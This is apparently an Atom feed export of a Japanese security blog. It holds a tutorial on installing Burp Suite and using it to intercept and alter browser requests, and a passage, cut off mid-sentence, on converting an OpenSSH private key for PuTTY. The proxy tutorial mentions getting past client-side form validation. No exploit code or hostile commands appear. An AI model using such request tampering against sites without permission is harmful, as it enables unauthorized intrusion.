<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5550886365390077462</id><updated>2012-02-17T11:49:01.419+09:00</updated><category term='Linux SSH2 公開鍵認証　UTF-8 TeraTerm Pro with TTSSH2'/><category term='W-ZERO3 アドエス　ssh ssh2 公開鍵認証 teraterm PuTTTY'/><category term='XSSチェック WebSecurity BurpSuite Web Exploits'/><category term='アクセス解析　ネットストーカー　クローラー'/><category term='Web改竄　ハッキング　Security'/><category term='UNIX shell　ProgressBar　プログレスバー'/><category term='RootKit BackDoor Hack SuID exploit　perl-suidperl'/><title type='text'>Security Log</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://root99.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://root99.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>john</name><uri>http://www.blogger.com/profile/03499652466972721958</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>8</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5550886365390077462.post-6738534278547873303</id><published>2008-06-04T10:30:00.031+09:00</published><updated>2008-06-06T02:08:05.264+09:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XSSチェック WebSecurity BurpSuite Web Exploits'/><title type='text'>Burpsuite (Burp Proxy) の使い方</title><content type='html'>&lt;a href="http://sectools.org/web-scanners.html"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207867633145243906" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://2.bp.blogspot.com/_8igRYQ31rD8/SEYQBRbgaQI/AAAAAAAAAEs/4p-yFM1Bf44/s200/sectools1.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;今日はよい子のためのWebセキュリティの講座です！&lt;br /&gt;Web Vulnerability Scanners でいいのがリストされているページがあるので見ましょう。&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sectools.org/web-scanners.html" target="blank"&gt;&lt;span style="font-size:85%;"&gt;http://sectools.org/web-scanners.html&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;　&lt;img id="BLOGGER_PHOTO_ID_5207867628850276594" style="margin: 0px 10px 10px 0px; float: right;" alt="" src="http://1.bp.blogspot.com/_8igRYQ31rD8/SEYQBBbgaPI/AAAAAAAAAEk/w4oi0TWxiV4/s200/sectools2.jpg" border="0" /&gt;&lt;br /&gt;このサイトにはセキュリティ関係のツールが&lt;br /&gt;沢山紹介されています。&lt;br /&gt;もちろん、全OS対象ですので安心です。&lt;br /&gt;&lt;br /&gt;今日はこの中から６位にランキングされている&lt;br /&gt;Burpsuite(バープスイート)というツールを導入&lt;br /&gt;してみましょう。&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_8igRYQ31rD8/SEYQBBbgaOI/AAAAAAAAAEc/cSsJCKs_DLI/s1600-h/sectools3.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207867628850276578" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://1.bp.blogspot.com/_8igRYQ31rD8/SEYQBBbgaOI/AAAAAAAAAEc/cSsJCKs_DLI/s200/sectools3.jpg" border="0" /&gt;&lt;/a&gt; &lt;a href="http://portswigger.net/suite/" target="blank"&gt;Burpsuite&lt;/a&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;: An integrated platform for attacking web applicationsBurp suite allows an attacker to combine manual and automated techniques to enumerate, analyze, attack and exploit web applications. The various burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another. &lt;/span&gt;&lt;br /&gt;訳：こいつはグレイトなツールだ！ Webのアタックにも使えるぜ！ha-ha-ha-!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_8igRYQ31rD8/SEYQbhbgaRI/AAAAAAAAAE0/Txgnnf67y-8/s1600-h/portswigger.net.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868084116810002" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://3.bp.blogspot.com/_8igRYQ31rD8/SEYQbhbgaRI/AAAAAAAAAE0/Txgnnf67y-8/s200/portswigger.net.jpg" border="0" /&gt;&lt;/a&gt;Burp suite のダウンロードは以下から行えます。&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;a href="http://portswigger.net/suite/download.html"&gt;http://portswigger.net/suite/download.html&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Windows版　&lt;a href="http://portswigger.net/suite/burpsuite_v1.1.zip"&gt;&lt;span style="font-size:85%;"&gt;http://portswigger.net/suite/burpsuite_v1.1.zip&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;Linux版　　　&lt;a href="http://portswigger.net/suite/burpsuite_v1.1.tar.gz"&gt;&lt;span style="font-size:85%;"&gt;http://portswigger.net/suite/burpsuite_v1.1.tar.gz&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQAxbgaMI/AAAAAAAAAEM/dfu61xVK2UI/s1600-h/suite.bat.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207867624555309250" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQAxbgaMI/AAAAAAAAAEM/dfu61xVK2UI/s200/suite.bat.jpg" border="0" /&gt;&lt;/a&gt; 今回はWindows版をダウンロードします。&lt;br /&gt;解凍すると、左のようなファイル群が出てきます。&lt;br /&gt;特にインストール作業は無いようですので、不要になればディレクトリごと削除して下さい。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ここで suite.bat を実行すれば burpsuite が動作するわけですが、今の段階では何も起こりません。&lt;br /&gt;サイトをよく見ると&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;Burp Suite is a Java application, and runs on any platform for which a Java Runtime Environment is available. It requires version 1.5 or later. The JRE can be obtained for free from http://java.sun.com/j2se/downloads.html.&lt;/span&gt;&lt;br /&gt;訳：バープスイートはJavaアプリだから、Java ランタイム v1.5以上 が無いと動かないんだよね。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQbxbgaUI/AAAAAAAAAFM/scghjh8t5fA/s1600-h/java.sun.com.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868088411777346" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQbxbgaUI/AAAAAAAAAFM/scghjh8t5fA/s200/java.sun.com.jpg" border="0" /&gt;&lt;/a&gt; と書いてありました。&lt;br /&gt;&lt;br /&gt;JREが必要、というわけで、Java ランタイムを落とします。&lt;br /&gt;sunのサイトを見るとバージョンがいろいろあって迷いますが、私はJava Runtime Environment (JRE) 6 Update 6　を入れました。&lt;br /&gt;&lt;a href="http://java.sun.com/j2se/downloads.html" target="blank"&gt;&lt;span style="font-size:85%;"&gt;Java SE Runtime Environment 6 Windows Offline Installation&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQbxbgaTI/AAAAAAAAAFE/rIJddb7c0H4/s1600-h/jre-6u6.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868088411777330" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQbxbgaTI/AAAAAAAAAFE/rIJddb7c0H4/s200/jre-6u6.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/VerifyItem-Start/jre-6u6-windows-i586-p.exe?BundledLineItemUUID=8KxIBe.okH8AAAEapF0neVFX&amp;amp;OrderID=qJpIBe.oQ0MAAAEamF0neVFX&amp;amp;ProductID=fU5IBe.nalwAAAEZyWklHgvk&amp;amp;FileName=/jre-6u6-windows-i586-p.exe" target="blank"&gt;jre-6u6-windows-i586-p.exe&lt;/a&gt; （JRE 6本体）&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQbxbgaSI/AAAAAAAAAE8/TJLWS2IdE-Q/s1600-h/jre-6u6install.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868088411777314" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQbxbgaSI/AAAAAAAAAE8/TJLWS2IdE-Q/s200/jre-6u6install.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;jre-6u6-windows-i586-p.exe を実行するとインストーラーが起動します。&lt;br /&gt;長いので説明は読まずに同意して下さい。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_8igRYQ31rD8/SEYQBBbgaNI/AAAAAAAAAEU/n1CZfWrlWp4/s1600-h/suite.bat.2.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207867628850276562" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://1.bp.blogspot.com/_8igRYQ31rD8/SEYQBBbgaNI/AAAAAAAAAEU/n1CZfWrlWp4/s200/suite.bat.2.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;特にWindowsの再起動は必要ありません。&lt;br /&gt;先ほどの suite.bat を実行すると、今度はDOSのウィンドウが開いてburpsuite が起動します。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;span style="font-size:180%;"&gt;●Burp Suite の設定方法&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQzxbgadI/AAAAAAAAAGU/GoFulVzoHhY/s1600-h/burpsuite.01.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868500728637906" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQzxbgadI/AAAAAAAAAGU/GoFulVzoHhY/s200/burpsuite.01.jpg" border="0" /&gt;&lt;/a&gt; 起動した直後の画面です。&lt;br /&gt;基本的な機能としては&lt;br /&gt;&lt;br /&gt;リクエスト&lt;br /&gt;Webサーバ &lt;----- BurpSuite &lt;----- ブラウザー&lt;br /&gt;応答&lt;br /&gt;Webサーバ -----&gt; BurpSuite -----&gt; ブラウザー&lt;br /&gt;&lt;br /&gt;といった具合に、ブラウザーとWebサーバの中間に立って、リクエストやデータを横取りしてしまおうという機能です。&lt;br /&gt;もちろん BurpSuite 上で、サーバに渡る直前のデータを改変して渡すことも可能です。&lt;br /&gt;一般的に、FORM からの送信内容をブラウザー側のJava Script で入力チェックをし、問題の無いデータをサーバに送信するといった仕組みも多く存在します。&lt;br /&gt;そのような、ブラウザーでのエラー確認の機構をすり抜けてチェックをかけることができます。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;まずはブラウザーの設定から&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_8igRYQ31rD8/SEYQsRbgaWI/AAAAAAAAAFc/bRXgdwe1xqg/s1600-h/IE01.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868371879618914" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://2.bp.blogspot.com/_8igRYQ31rD8/SEYQsRbgaWI/AAAAAAAAAFc/bRXgdwe1xqg/s200/IE01.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;IE の&lt;br /&gt;[ツール]→ [インターネットオプション]→ [接続]→ [LANの設定]&lt;br /&gt;からプロキシーの設定をします。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_8igRYQ31rD8/SEYQcBbgaVI/AAAAAAAAAFU/SNcI33RsgQE/s1600-h/IE02.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868092706744658" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://1.bp.blogspot.com/_8igRYQ31rD8/SEYQcBbgaVI/AAAAAAAAAFU/SNcI33RsgQE/s200/IE02.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Burpsuite は Proxy として動作します。&lt;br /&gt;個別の環境で変更も可能ですが、下記のデフォルト設定でまず問題はありません。&lt;br /&gt;&lt;br /&gt;■LANにプロキシーサーバを使用する　にチェック&lt;br /&gt;　　　　アドレス　　[ 127.0.0.1 ]&lt;br /&gt;　　　　ポート　　　[ 8080 ]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;通常の環境であれば、設定は以上で完了です。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQzxbgacI/AAAAAAAAAGM/URxIhbVUMdo/s1600-h/burpsuite.02.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868500728637890" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQzxbgacI/AAAAAAAAAGM/URxIhbVUMdo/s200/burpsuite.02.jpg" border="0" /&gt;&lt;/a&gt; もし、あなたの環境が Proxy を使用しなければ Webサーバにアクセスできない場合は、Burpsuite の [ comms ] タブをクリックしプロキシーサーバを経由するよう設定を追加しましょう。&lt;br /&gt;&lt;br /&gt;■ use proxy server　　にチェックを入れる&lt;br /&gt;　　　server [ プロキシーサーバのIP]&lt;br /&gt;　　　port [ プロキシーにアクセスするためのポート]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;　 　&lt;a href="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQzxbgabI/AAAAAAAAAGE/63l3oLIOStc/s1600-h/burpsuite.03.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868500728637874" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQzxbgabI/AAAAAAAAAGE/63l3oLIOStc/s200/burpsuite.03.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Webサーバ &lt;--- Proxy &lt;--- Burpsuite &lt;--- ブラウザ という構造になります。 ちなみに、うちの環境の場合だとこんな設定です。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;             &lt;hr /&gt;&lt;span style="font-size:180%;"&gt;●BurpSuite の使用方法&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_8igRYQ31rD8/SEYU0hbgaeI/AAAAAAAAAGc/wo_FC3CcIug/s1600-h/google.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207872911660050914" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://3.bp.blogspot.com/_8igRYQ31rD8/SEYU0hbgaeI/AAAAAAAAAGc/wo_FC3CcIug/s200/google.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;例として、ブラウザー上で Google.co.jp にアクセスしてみます。&lt;br /&gt;URL に http://www.google.co.jp/ を指定して実行しますが、この時点ではブラウザー上に何も表示されません。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQsxbgaaI/AAAAAAAAAF8/pGXumr80MZI/s1600-h/burpsuite.04.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868380469553570" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://4.bp.blogspot.com/_8igRYQ31rD8/SEYQsxbgaaI/AAAAAAAAAF8/pGXumr80MZI/s200/burpsuite.04.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;ブラウザーからの全ての要求は、Burpsuite で堰き止めているため&lt;br /&gt;通過させたい場合には、[ forward ] ボタンを押さなくてはなりません。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;特定のリクエストを廃棄したい場合には、[ drop ] ボタンを押します。&lt;br /&gt;ブラウザーからリクエストがある度に、選択することになりますのでサイトによっては何十回も forward することになります。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_8igRYQ31rD8/SEYQshbgaZI/AAAAAAAAAF0/9lxgCWI5OPE/s1600-h/burpsuite.05.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868376174586258" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://3.bp.blogspot.com/_8igRYQ31rD8/SEYQshbgaZI/AAAAAAAAAF0/9lxgCWI5OPE/s200/burpsuite.05.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;では、&lt;br /&gt;試しに、Google のテキストボックスに [ burp suite ] として検索実行してみて下さい。&lt;br /&gt;&lt;br /&gt;intercept タブの中で、さらに params というタブがありますが&lt;br /&gt;その中に今自分が入力した文字列を見つけることができるでしょう。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_8igRYQ31rD8/SEYQshbgaYI/AAAAAAAAAFs/8Y0YDeak_ho/s1600-h/burpsuite.06.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868376174586242" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://3.bp.blogspot.com/_8igRYQ31rD8/SEYQshbgaYI/AAAAAAAAAFs/8Y0YDeak_ho/s200/burpsuite.06.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;今回の場合、GET request 中の type URL q=burp+suite&lt;br /&gt;という部分がそれです。&lt;br /&gt;&lt;br /&gt;パラメータを直接ダブル・クリックして内容を改変してみましょう。&lt;br /&gt;&lt;br /&gt;burp+suite +root99.blogspot.com&lt;br /&gt;&lt;br /&gt;と入力し、 [ forward ] ボタンを押します。&lt;br /&gt;Webサーバには、書き換えられた burp+suite +root99.blogspot.com の情報で送信されます。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_8igRYQ31rD8/SEYQsRbgaXI/AAAAAAAAAFk/H7pgoha8xjs/s1600-h/burpsuite.07.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5207868371879618930" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://2.bp.blogspot.com/_8igRYQ31rD8/SEYQsRbgaXI/AAAAAAAAAFk/H7pgoha8xjs/s200/burpsuite.07.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Google の応答結果を見ると、検索内容が書き換わっていることがわかります。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;インストールできた？&lt;br /&gt;そしたらはやく俺の作業手伝って！！！&lt;br /&gt;&lt;br /&gt;つづく&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5550886365390077462-6738534278547873303?l=root99.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://root99.blogspot.com/feeds/6738534278547873303/comments/default' title='コメントの投稿'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5550886365390077462&amp;postID=6738534278547873303' title='0 件のコメント'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/6738534278547873303'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/6738534278547873303'/><link rel='alternate' type='text/html' href='http://root99.blogspot.com/2008/06/webburpsuite.html' title='Burpsuite (Burp Proxy) の使い方'/><author><name>john</name><uri>http://www.blogger.com/profile/03499652466972721958</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_8igRYQ31rD8/SEYQBRbgaQI/AAAAAAAAAEs/4p-yFM1Bf44/s72-c/sectools1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5550886365390077462.post-4922857301537650120</id><published>2008-03-16T21:14:00.018+09:00</published><updated>2008-03-17T00:01:09.271+09:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='W-ZERO3 アドエス　ssh ssh2 公開鍵認証 teraterm PuTTTY'/><title type='text'>Advanced/W-ZERO3［es］でSSH2で公開鍵認証</title><content type='html'>&lt;a href="http://root99.blogspot.com/2008/02/ws011sh-sslvpn-ssh.html"&gt;アドエス(WS011SH)で SSLVPN で SSH&lt;/a&gt; 　のつづきです。&lt;br /&gt;参考：&lt;a href="http://root99.blogspot.com/2008/03/teratermssh2.html"&gt;SSH2で公開鍵認証を利用する&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;前回までに&lt;br /&gt;・Advanced/W-ZERO3［es］上でSSH2接続が使えるPocketPuTTYの入手&lt;br /&gt;・サーバ上で公開鍵認証を行うためのsshd.confの設定&lt;br /&gt;を行いました。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;今回行いたいことは&lt;br /&gt;&lt;br /&gt;W-ZERO3 ------(ssh2)--------&gt; Linuxサーバ&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Aの秘密鍵&lt;/span&gt;　　　　　　 　　　　　　&lt;span style="color: rgb(51, 204, 0);"&gt;Aの公開鍵&lt;/span&gt;は認証済みの状態&lt;br /&gt;&lt;br /&gt;となります。&lt;br /&gt;上記の[Aの秘密鍵]とは &lt;span style="color: rgb(255, 0, 0);"&gt;id_rsa&lt;/span&gt;ですが、W-ZERO3上で動作する PocketPuTTY では&lt;br /&gt;Faqinなことに OpenSSHで作成した&lt;span style="color: rgb(255, 0, 0);"&gt;id_rsa&lt;/span&gt;のままでは利用できません。&lt;br /&gt;そのため&lt;span style="color: rgb(255, 0, 0);"&gt;id_rsa&lt;/span&gt;ファイルをPuTTY形式に変換する必要があります。&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);font-size:78%;" &gt;全くもってPuxxyな野郎だ！&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.chiark.greenend.org.uk/%7Esgtatham/putty/download.html"&gt;PuTTY Download Page &lt;/a&gt;&lt;br /&gt;から&lt;a href="http://the.earth.li/%7Esgtatham/putty/latest/x86/puttygen.exe"&gt;http://the.earth.li/~sgtatham/putty/latest/x86/puttygen.exe&lt;/a&gt;をダウンロードして下さい。&lt;br /&gt;&lt;br /&gt;puttygen.exe はWindowsクライアント側で各種sshのkey pairを作成する機能の他に&lt;br /&gt;OpenSSHの鍵ファイルの変換機能もあります。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;以下の手順で&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;id_rsa&lt;/span&gt;の秘密鍵をPuTTY形式に変換したもの→&lt;span style="color: rgb(255, 0, 0);"&gt;id_rsa.ppk&lt;/span&gt;を作成します。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;１．puttygen.exe を起動する。&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_8igRYQ31rD8/R90TTwOuEUI/AAAAAAAAAC0/-z2-rKAgbrg/s1600-h/PuTTY_Generator1.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5178316376631021890" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://1.bp.blogspot.com/_8igRYQ31rD8/R90TTwOuEUI/AAAAAAAAAC0/-z2-rKAgbrg/s200/PuTTY_Generator1.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;２．既存のid_rsaファイルを開く&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_8igRYQ31rD8/R90TbwOuEVI/AAAAAAAAAC8/eMciOFA9T2o/s1600-h/PuTTY_Generator2.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5178316514069975378" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://1.bp.blogspot.com/_8igRYQ31rD8/R90TbwOuEVI/AAAAAAAAAC8/eMciOFA9T2o/s200/PuTTY_Generator2.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;[File] → [Load private key] を選択します。&lt;br /&gt;&lt;br /&gt;ダイアログが開くので、ファイル形式を&lt;br /&gt;[PuTTY Private Key Files(*.ppk)] から [All Files(*.*)] にして&lt;br /&gt;&lt;br /&gt;全表示にした上で既存の &lt;span style="color: rgb(255, 0, 0);"&gt;id_rsa&lt;/span&gt; ファイルを指定します。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_8igRYQ31rD8/R90TlQOuEWI/AAAAAAAAADE/LDgdVvgpwWk/s1600-h/PuTTY_Generator3.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5178316677278732642" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://3.bp.blogspot.com/_8igRYQ31rD8/R90TlQOuEWI/AAAAAAAAADE/LDgdVvgpwWk/s200/PuTTY_Generator3.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;すると鍵を作成した時に決めたパスフレーズを聞かれます。&lt;br /&gt;（前回Textの&lt;span style="color: rgb(51, 204, 255);"&gt;root99hoge&lt;/span&gt;にあたるもの）&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_8igRYQ31rD8/R90TsQOuEXI/AAAAAAAAADM/bY6h6xPfyoY/s1600-h/PuTTY_Generator4.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5178316797537816946" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://3.bp.blogspot.com/_8igRYQ31rD8/R90TsQOuEXI/AAAAAAAAADM/bY6h6xPfyoY/s200/PuTTY_Generator4.png" border="0" /&gt;&lt;/a&gt; パスフレーズが正しければ&lt;br /&gt;Successfully imported foreign key&lt;br /&gt;(OpenSSH SSH-2 private key).&lt;br /&gt;To use this key with PuTTY, you need to&lt;br /&gt;use the "Save private key" command to&lt;br /&gt;save it in PuTTY's own format.&lt;br /&gt;と表示されます。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;３．PuTTY形式に変換する。&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_8igRYQ31rD8/R90j1wOuEZI/AAAAAAAAADc/Xa_TkmWPJ6U/s1600-h/PuTTY_Generator5.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5178334552932618642" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://1.bp.blogspot.com/_8igRYQ31rD8/R90j1wOuEZI/AAAAAAAAADc/Xa_TkmWPJ6U/s200/PuTTY_Generator5.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;●SSH-2 RSA のチェックが入っていることを確認し&lt;br /&gt;[Save private key] ボタンを押します。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_8igRYQ31rD8/R90kDQOuEaI/AAAAAAAAADk/OTkqhev62Yc/s1600-h/PuTTY_Generator6.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5178334784860852642" style="margin: 0px 10px 10px 0px; float: left;" alt="" src="http://3.bp.blogspot.com/_8igRYQ31rD8/R90kDQOuEaI/AAAAAAAAADk/OTkqhev62Yc/s200/PuTTY_Generator6.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;ファイル名を &lt;span style="color: rgb(255, 0, 0);"&gt;id_rsa.ppk&lt;/span&gt; として保存先を指定して下さい。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;あとは、この&lt;span style="color: rgb(255, 0, 0);"&gt;id_rsa.ppk&lt;/span&gt;ファイルを W-ZERO3 